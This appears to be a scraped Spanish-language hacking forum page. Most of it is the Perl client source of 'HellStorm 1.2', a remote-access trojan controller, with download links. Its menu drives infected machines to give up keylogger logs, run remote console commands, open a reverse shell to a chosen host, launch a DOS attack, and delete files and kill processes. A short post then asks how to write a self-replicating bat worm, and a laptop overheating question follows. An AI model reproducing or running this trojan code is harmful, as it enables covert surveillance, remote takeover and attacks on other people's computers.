            for my $data ( keys %valor ) {
                if ( $valor{$data} eq $letra ) {
                    $letra =~ s/$valor{$data}/$data/g;
                    push( @re, $letra );
                }
            }
        }
    }
    return @re;
}

sub dameip {

    my @wor = encriptar( getmyip(), "encode" );

    for (@wor) {
        $resultado .= $_;
    }
    return $resultado;
}

# The End ?

client.pl

Código:

#!usr/bin/perl
#Project HellStorm 1.2
#(C) Doddy Hackman 2015

use IO::Socket;
use Cwd;

&menu;

# Functions

sub clean {
    my $os = $^O;
    if ( $os =~ /Win32/ig ) {
        system("cls");
    }
    else {
        system("clear");
    }
}

sub head {

    clean();

    print "\n\n-- == HellStorm 1.2 (C) Doddy Hackman 2015 == --\n\n\n";

}

sub menu {

    &head;

    print "[+] Target : ";
    chomp( my $ip = <STDIN> );

    my $socket = new IO::Socket::INET(
        PeerAddr => $ip,
        PeerPort => 666,
        Proto    => 'tcp',
        Timeout  => 5
    );

    if ($socket) {
        $socket->close;
        &menuo($ip);
    }
    else {
        print "\n\n[-] Server not infected\n";
        <STDIN>;
        &menu;
    }

}

sub menuo {

    &head;

    print "[$_[0]] : Online\n\n";
    print q(
1 : Information
2 : Files Manager
3 : Open CD
4 : Close CD
5 : Talk
6 : Message
7 : Console
8 : Hide taskbar
9 : Show taskbar
10 : Hide Icons
11 : Show Icons
12 : Process Manager
13 : Reverse Shell
14 : DOS Attack
15 : Change Wallpaper
16 : Word Writer
17 : Move Mouse
18 : See logs keylogger
19 : Change target
20 : Exit


);
    print "[Option] : ";
    chomp( my $opcion = <STDIN> );

    if ( $opcion eq 1 ) {
        print "\n\n[+] Information\n\n";
        $re = daryrecibir( $_[0], "infor" );
        if ( $re =~ /:(.*):(.*):(.*):(.*):(.*):/ ) {
            print "[+] Domain : $1\n";
            print "[+] Chip : $2\n";
            print "[+] Version : $3\n";
            print "[+] Username : $4\n";
            print "[+] OS : $5\n";
            print "\n[+] Press any key to continue\n";
            <stdin>;
        }
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 2 ) {

      menu1:
        print "\n\n[+] Files Manager\n\n";
        $cwd = daryrecibir( $_[0], "getcwd" . "\r\n" );
        show( $_[0], "/" );
        &menu2;

        sub menu2 {
            print "\n\n[Options]\n\n";
            print "1 - Change directory\n";
            print "2 - Rename\n";
            print "3 - Delete File\n";
            print "4 - Delete Directory\n";
            print "5 - Return to menu\n\n";
            print "[Opcion] : ";
            chomp( my $op = <stdin> );

            if ( $op eq 1 ) {
                print "\n\n[+] Directory : ";
                chomp( my $dir = <stdin> );
                $ver = daryrecibir( $_[0], "chdirnow K0BRA" . $dir . "K0BRA" );
                if ( $ver =~ /ok/ig ) {
                    print "\n\n[+] Directory changed\n\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                    <stdin>;
                }
                show( $_[0], $dir );
                &menu2;
                print "\n[+] Press any key to continue\n";
                <stdin>;
            }

            elsif ( $op eq 2 ) {
                print "\n\n[+] Name : ";
                chomp( my $old = <stdin> );
                print "\n\n[+] New name : ";
                chomp( my $new = <stdin> );
                $re = daryrecibir( $_[0], "rename :$old:$new:" );
                if ( $re =~ /ok/ ) {
                    print "\n\n[+] File renamed\n\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
                print "\n[+] Press any key to continue\n";
                <stdin>;
            }

            elsif ( $op eq 3 ) {
                print "\n\n[+] File to delete : ";
                chomp( my $file = <stdin> );
                $re =
                  daryrecibir( $_[0], "borrarfile K0BRA" . $file . "K0BRA" );
                if ( $re =~ /ok/ ) {
                    print "\n\n[+] File deleted\n\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
                print "\n[+] Press any key to continue\n";
                <stdin>;
            }

            elsif ( $op eq 4 ) {
                print "\n\n[+] Directory to delete : ";
                chomp( my $file = <stdin> );
                $re = daryrecibir( $_[0], "borrardir K0BRA" . $file . "K0BRA" );
                if ( $re =~ /ok/ ) {
                    print "\n\n[+] Directory deleted\n\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
                print "\n[+] Press any key to continue\n";
                <stdin>;
            }

            elsif ( $op eq 5 ) {
                &menuo( $_[0] );

            }
            else {
                show( $_[0], "/" );
            }
            goto menu1;
        }
    }

    elsif ( $opcion eq 3 ) {
        daryrecibir( $_[0], "opencd" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }

    elsif ( $opcion eq 4 ) {
        daryrecibir( $_[0], "closedcd" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }

    elsif ( $opcion eq 5 ) {
        print "\n\n[+] Talk : ";
        chomp( my $talk = <stdin> );
        $re = daryrecibir( $_[0], "speak :$talk:" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }

    elsif ( $opcion eq 6 ) {
        print "\n[+] Message : ";
        chomp( my $msg = <stdin> );
        daryrecibir( $_[0], "msgbox $msg" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 7 ) {

      menu:

        my $cmd, $re;

        print "\n\n>";

        chomp( my $cmd = <stdin> );

        if ( $cmd =~ /exit/ig ) {
            print "\n[+] Press any key to continue\n";
            <stdin>;
            &menuo( $_[0] );
        }

        $re = daryrecibir( $_[0], "comando :$cmd:" );
        print "\n" . $re;
        goto menu;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 8 ) {
        daryrecibir( $_[0], "iniciochau" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 9 ) {
        daryrecibir( $_[0], "iniciovuelve" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 10 ) {
        daryrecibir( $_[0], "iconochau" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 11 ) {
        daryrecibir( $_[0], "iconovuelve" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }

    elsif ( $opcion eq 12 ) {

        &reload( $_[0] );

        sub reload {

            my @pro;
            my @pids;

            my $sockex = new IO::Socket::INET(
                PeerAddr => $_[0],
                PeerPort => 666,
                Proto    => 'tcp',
                Timeout  => 5
            );

            print $sockex "mostrarpro" . "\r\n";
            $sockex->read( $re, 5000 );
            $sockex->close;

            chomp $re;

            print "\n\n[+] Process Found\n\n";

            while ( $re =~ /PROXEC(.*?)PROXEC/ig ) {
                if ( $1 ne "" ) {
                    push( @pro, $1 );
                }
            }

            while ( $re =~ /PIDX(.*?)PIDX/ig ) {
                if ( $1 ne "" ) {
                    push( @pids, $1 );
                }
            }

            $cantidad = int(@pro);

            for my $num ( 1 .. $cantidad ) {
                if ( $pro[$num] ne "" ) {
                    print "\n[+] Process : " . $pro[$num] . "\n";
                    print "[+] PID : " . $pids[$num] . "\n";
                }
            }

            print q(

[Options]


1 - Refresh list
2 - Close process
3 - Return to menu
 
);

            print "\n[Option] :  ";
            chomp( my $opc = <stdin> );

            if ( $opc =~ /1/ig ) {
                &reload( $_[0] );
            }
            elsif ( $opc =~ /2/ig ) {
                print "\n[+] Write the name of the process : ";
                chomp( my $numb = <stdin> );
                print "\n[+] Write the PID of the process : ";
                chomp( my $pid = <stdin> );
                $re = daryrecibir( $_[0],
                    "chauproce K0BRA" . $pid . "K0BRA" . $numb . "K0BRA" );
                if ( $re =~ /ok/ig ) {
                    print "\n\n[+] Proceso killed\n\n";
                }
                else {
                    print "\n\n[-] Error\n\n";
                }
                print "\n[+] Press any key to continue\n";
                <stdin>;
                &reload( $_[0] );
            }
            elsif ( $opc =~ /3/ig ) {
                print "\n[+] Press any key to continue\n";
                <stdin>;
                &menuo( $_[0] );
            }
            else {
                &reload;
            }
        }
    }

    elsif ( $opcion eq 13 ) {
        print "\n\n[+] IP : ";
        chomp( my $ip = <stdin> );
        print "\n\n[+] Port : ";
        chomp( my $port = <stdin> );
        print "\n\n[+] Connected !!!\n\n";
        $re = daryrecibir( $_[0], "backshell :$ip:$port:" );
    }
    elsif ( $opcion eq 14 ) {
        print "\n\n[+] IP : ";
        chomp( my $ipx = <stdin> );
        print "\n\n[+] Port : ";
        chomp( my $por = <stdin> );
        print "\n\n[+] Count : ";
        chomp( my $count = <stdin> );
        print "\n\n[+] Command Send !!!!\n\n";
        daryrecibir( $_[0], "dosattack :$ipx:$por:$count:" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 15 ) {
        print "\n\n[+] Image with format BMP : ";
        chomp( my $id = <stdin> );
        daryrecibir( $_[0], "cambiarfondo $id" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 16 ) {
        print "\n\n[+] Text : ";
        chomp( my $tx = <stdin> );
        daryrecibir( $_[0], "word :$tx:" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 17 ) {
        daryrecibir( $_[0], "crazymouse" );
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 18 ) {
        print "\n\n[Logs]\n\n";
        $re = daryrecibir( $_[0], "verlogs" );
        print $re. "\n\n";
        print "\n[+] Press any key to continue\n";
        <stdin>;
        &menuo( $_[0] );
    }
    elsif ( $opcion eq 19 ) {
        &menu;
    }
    elsif ( $opcion eq 20 ) {
        print "\n[+] Press any key to continue\n";
        <stdin>;
        exit 1;
    }
    else {
        &menuo;
    }
}

sub daryrecibir {

    my $sockex = new IO::Socket::INET(
        PeerAddr => $_[0],
        PeerPort => 666,
        Proto    => 'tcp',
        Timeout  => 5
    );

    print $sockex $_[1] . "\r\n";
    $sockex->read( $re, 5000 );
    $sockex->close;
    return $re . "\r";
}

sub show {

    my $re = daryrecibir( $_[0], "getcwd" . "\r\n" );
    print "\n\n[+] Directory : $re\n\n";
    $re1 = daryrecibir( $_[0], "dirnow ACATOY" . $re . "ACATOY" . "\r\n" );
    print "\n\n[Directories found]\n\n";
    while ( $re1 =~ /DIREX(.*?)DIREX/ig ) {
        if ( $1 ne "" ) {
            print "[+] $1\n";
        }
    }

    print "\n\n[Files found]\n\n";

    while ( $re1 =~ /FILEX(.*?)FILEX/ig ) {
        if ( $1 ne "" ) {
            print "[+] $1\n";
        }
    }

}

#The End ?

Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.
Github.

Eso seria todo.

¿Como hacer que un archivo bat se autoduplique?

$
0
0
Hola comunidad , me podrían ayudar con este problema . Resulta que quiero ...
mejor vamos a la manera grafica .

echo echo>archivo.txt

Algo así , quiero que desde un archivo base se cree otro y que la copia cree otro . Hay una forma de hacerlo ? o Hay otro manera de hacer un gusano .

Nota : Solo se programar en bat .
Saludos a todos :D

problema laptop hp se apaga de repente

$
0
0
Buenos dias compañeros, tengo una laptop hp modelo probook 6455b y resulta que, en un principio al encender la lap la pantalla se quedaba en negro, los leds permanecian encendidos pero, un par de estos encendian y apagaban unas 5 veces (los leds que corresponden a las figuras de un candado con una letra "A" mayuscula y un candado con el número "1").

Segun investigue en la red encontre en un foro de hp que esto era un problema de la tarjeta madre o el microprocesador y que la unica solucion es el remplazo de estas partes.

Aun asi, decidi probar para ver si no era otra cosa, quitando las memorias, entercambiandolas de lugar (tiene 2 de 2gb cada una), quitar ambas memorias y encendiendo la lap, pero aun asi, seguia con el mismo problema.

Decidi quitar el disco duro y formatearlo e instalando windows 7 professional desde una computadora de escritorio y sin problema alguno pude hacerlo.

A raiz de esto, supongo que el problema estabva en la laptop en si, asi que nuevamente, volvi a colocar el disco duro y probar nuevamente a encenderla.

La sorpresa es que, por un momento, la lap si encendia, la pantalla por fin se encendio y empezaba a leer desde el disco, pero despues de poco tiempo, esta se apago nuevamente.

Decidi quitar el teclado y tocar el disipador de la laptop (el disipador segun yo, es una pieza de metal plateado que tiene pegada como un peuqeño tubo de cobre aplastado el cual va hacia un pequeño ventilador, el cual expulza el aire hacia afuera y esta ubicado en la esquina superior ixquierda) y veo que para mi sorpresa este esta demaciado caliente para el pequeño rato que estubo encendida.

Tambien intente montar un linux en una usb a modo de live cd para descartar que no fuera el disco duro y en efecto este tambien lo lee pero de nuevo despues de un rato se apaga.

No se si la laptop tenga alguna solucion o si definitivamente ya no tiene remedio.

Tampoco se si al quitar dicho disipador y ponerle nueva pasta termica pueda arreglarla.
Viewing all 11602 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>